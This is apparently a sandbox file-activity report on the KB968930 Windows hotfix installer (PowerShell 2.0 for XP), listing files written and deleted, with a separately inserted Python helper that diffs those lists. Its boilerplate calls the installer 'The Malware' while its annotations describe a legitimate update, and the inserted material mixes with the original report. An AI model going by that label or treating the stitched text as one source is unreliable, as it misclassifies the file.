C:\ae90c0f98410dabe3b7635b5ceb43e\about_foreach.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_jobs.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.diagnostics.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_break.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\certificate.format.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmtxt.xsl (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_parsing.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershell_ise.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\profile.ps1 (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_try_catch_finally.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\windowsremoteshell.adm (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wtrinstaller.ico (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_preference_variables.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.gpowershell.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmwmipl.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_type_operators.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_execution_policies.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_trap.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_throw.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_providers.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_prompts.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\getevent.types.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_script_blocks.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.management.dll-help.xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_assignment_operators.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.graphicalhost.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_windows_powershell_2.0.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\importallmodules.psd1 (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_reserved_words.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_escape_characters.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_path_syntax.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_quoting_rules.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_types.ps1xml.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pscustomsetuputil.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmres.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_bits_cmdlets.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.consolehost.dll-help.xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_if.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershell.exe.mui (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.consolehost.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.diagnostics.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_arithmetic_operators.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_job_details.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_regular_expressions.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_redirection.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershell_ise.resources.dll (0 bytes)
C:\_869453_ (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_modules.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.editor.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_logical_operators.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\spmsg.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wevtfwd.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\diagnostics.format.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmauto.mof (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrm.cmd (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.consolehost.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_split.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\types.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\filesystem.format.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_scopes.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.gpowershell.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_variables.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\winrm.vbs (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_switch.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_methods.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\registry.format.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_ws-management_cmdlets.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.utility.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.management.dll-help.xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.utility.dll-help.xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.dll-help.xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_requirements.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_commonparameters.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\powershelltrace.format.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_transactions.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_pipelines.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\default.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_history.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\update.ver (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\spcustom.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pspluginwkr.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.security.dll-help.xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\pwrshsip.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.management.resources.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_jobs.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_data_sections.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsman.format.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_core_commands.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\dotnettypes.format.ps1xml (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_session_configurations.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_windows_powershell_ise.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\about_format.ps1xml.help.txt (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\system.management.automation.dll (0 bytes)
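Added example, not part of the Lavasoft report: a small Python triage helper that reads file-activity lists in the layout used above and answers the two questions a responder asks first, which written files are still on disk after the run, and whether the extraction directory was fully cleaned up. The embedded excerpt is constructed from a few lines of this report; the function and key names are assumptions of this example.

```python
"""Triage helper for a sandbox file-activity dump (added example, not part of the
Lavasoft report).  It parses the "creates and/or writes" and "deletes" lists in the
layout used above and reports which files remain on disk after the run and whether
the extraction directory was cleaned up."""
import re

# Constructed excerpt: a few lines copied from this report, in its own layout.
SAMPLE_REPORT = r"""
The process mofcomp.exe:2768 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (0 bytes)

The process WindowsXP-KB968930-x86-ENG.exe:804 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\ae90c0f98410dabe3b7635b5ceb43e\powershell.exe (7339 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\kb968930xp.cat (512 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmsvc.dll (15909 bytes)
C:\$Directory (800 bytes)

The Malware deletes the following file(s):

C:\ae90c0f98410dabe3b7635b5ceb43e\powershell.exe (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\update\kb968930xp.cat (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e\wsmsvc.dll (0 bytes)
C:\ae90c0f98410dabe3b7635b5ceb43e (0 bytes)
"""

PROCESS_RE = re.compile(r"^The process (\S+) makes changes in the file system\.$")
ENTRY_RE = re.compile(r"^(.+) \((\d+) bytes\)$")


def parse_file_events(report):
    """Return (process, action, path, size) tuples; action is 'write' or 'delete'."""
    events = []
    process = action = None
    for raw in report.splitlines():
        line = raw.strip()
        m = PROCESS_RE.match(line)
        if m:
            process, action = m.group(1), None
        elif line.startswith("The Malware creates"):
            action = "write"
        elif line.startswith("The Malware deletes"):
            action = "delete"
        else:
            m = ENTRY_RE.match(line)
            if m and process and action:
                events.append((process, action, m.group(1), int(m.group(2))))
    return events


def summarize(events):
    """Diff writes against deletes.

    residual:          paths written and never deleted (what to look for on the host)
    staging_dirs:      deleted paths that contained written files (extraction dirs)
    staging_leftovers: files under a staging dir that were not deleted (incomplete cleanup)
    """
    written = {}
    deleted = set()
    for process, action, path, size in events:
        if action == "write":
            written[path] = (process, size)
        else:
            deleted.add(path)
    residual = {p: v for p, v in written.items() if p not in deleted}
    staging_dirs = sorted(
        d for d in deleted if any(p.startswith(d + "\\") for p in written)
    )
    staging_leftovers = sorted(
        p for p in residual if any(p.startswith(d + "\\") for d in staging_dirs)
    )
    return {
        "written": len(written),
        "deleted": len(deleted),
        "residual": residual,
        "staging_dirs": staging_dirs,
        "staging_leftovers": staging_leftovers,
    }


if __name__ == "__main__":
    result = summarize(parse_file_events(SAMPLE_REPORT))
    print(f"{result['written']} paths written, {result['deleted']} deleted")
    for d in result["staging_dirs"]:
        print("staging dir removed:", d)
    for path, (process, size) in sorted(result["residual"].items()):
        print(f"residual: {path} ({size} bytes, by {process})")
```

On the excerpt, the only residual paths are the mofcomp.exe log and C:\$Directory; everything written under C:\ae90c0f98410dabe3b7635b5ceb43e is deleted again and the directory itself is removed, which is the pattern of an installer cleaning up its extraction directory. Run the same parser over the complete lists above to confirm that the ngen.log and mofcomp.log entries are the only files left behind.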

The processes ngen.exe:4084, 3616, 3712, 3636, 3672, 252, 3652, 4092, 3576, 492, 364, 3628, 3600, 3660, 3608, 1796, 3524, 3644, 3720, 3704, 3560, 3680 and 3548 make changes in the file system. ngen.exe is the .NET Framework Native Image Generator, not a component of the sample; these instances are consistent with the KB968930 installation queueing native-image compilation of the PowerShell assemblies (the mscorsvw.exe NativeImages entries below are the compilation itself). Each instance writes only to ngen's own log:

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (bytes written per process: 4084: 1184; 3616: 494; 3712: 474; 3636: 1104; 3672: 468; 252: 1418; 3652: 770; 4092: 486; 3576: 554; 492: 728; 364: 782; 3628: 772; 3600: 866; 3660: 1114; 3608: 1186; 1796: 1098; 3524: 596; 3644: 1450; 3720: 826; 3704: 1140; 3560: 1220; 3680: 800; 3548: 896)

The process update.exe:304 makes changes in the file system. update.exe is the Windows hotfix installer for KB968930 (the $968930Uinstall_KB968930$ and KB968930.log paths below identify the package), i.e. Windows Management Framework Core, which brings PowerShell 2.0 and WinRM 2.0 to Windows XP SP3. The SET*.tmp names are setupapi staging copies that are renamed over their final names once written, %WinDir%\$968930Uinstall_KB968930$ is the hotfix's uninstall backup, and the *.log files directly under %WinDir% are optional-component setup logs; none of these paths is specific to the sample. The process creates and/or writes to the following file(s):

%System%\SETBF.tmp (42 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
%System%\SET12.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
%System%\SETC.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
%System%\SET2D.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
%System%\SET25.tmp (1281 bytes)
%System%\SET13.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
%System%\SET20.tmp (2 bytes)
%System%\SET14.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
%WinDir%\inf\SET32.tmp (38 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
%System%\SET2A.tmp (2 bytes)
%WinDir%\inf\oem10.PNF (10136 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
%System%\SET7.tmp (35 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
%WinDir%\msmqinst.log (5648 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
%System%\SET22.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
%System%\SET2B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
%WinDir%\inf\SET18.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
%System%\SETE.tmp (22 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
%System%\SET6.tmp (2 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\wbem\SET4.tmp (4 bytes)
%System%\SET17.tmp (673 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\config\SYSTEM.LOG (5193 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
%System%\SET27.tmp (601 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
%System%\SET11.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
%System%\config (200 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
%WinDir%\Help\SETC5.tmp (12287 bytes)
%System%\SET8.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SETF.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
%System%\SET10.tmp (2 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
%System%\SET26.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
%System%\SET21.tmp (35 bytes)
%System%\config\system (2630 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
%WinDir%\SECD0.tmp (1897 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
%WinDir%\imsins.log (3792 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
%System%\SET16.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
%System%\CatRoot2\dberr.txt (1031 bytes)
%System%\SETB.tmp (1281 bytes)
%System%\SET1F.tmp (1 bytes)
%WinDir%\iis6.log (135629 bytes)
%WinDir%\comsetup.log (48646 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
%System%\SET28.tmp (22 bytes)
%System%\SET5.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
%System%\SET31.tmp (673 bytes)
%System%\SET2E.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
%System%\SET29.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
%System%\SET2C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
%WinDir%\KB968930.log (245581 bytes)
%System%\SET15.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
%WinDir%\ntdtcsetup.log (22997 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
%System%\SET24.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
%System%\winrm\0409\SET1D.tmp (601 bytes)
%System%\SETD.tmp (601 bytes)
%WinDir%\inf\SET19.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
%System%\SET9.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
%System%\winrm\0409\SET37.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
%WinDir%\ocgen.log (71000 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
%System%\SET2F.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
%System%\SET30.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
%System%\wbem\SET1E.tmp (4 bytes)
%System%\SET23.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
%WinDir%\inf\SET33.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)

The process deletes the following file(s). The SET*.tmp names recur from the list above, and the winrm*, winrs*, Wsm* and *.adm names are the install targets; both are consistent with setupapi renaming staged copies into place rather than with removal of installed components:

%System%\SETBF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (0 bytes)
%System%\SET12.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (0 bytes)
%WinDir%\_000003_.tmp.dll (0 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (0 bytes)
%System%\SETC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (0 bytes)
%System%\_000002_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (0 bytes)
%System%\wevtfwd.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (0 bytes)
%WinDir%\inf\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (0 bytes)
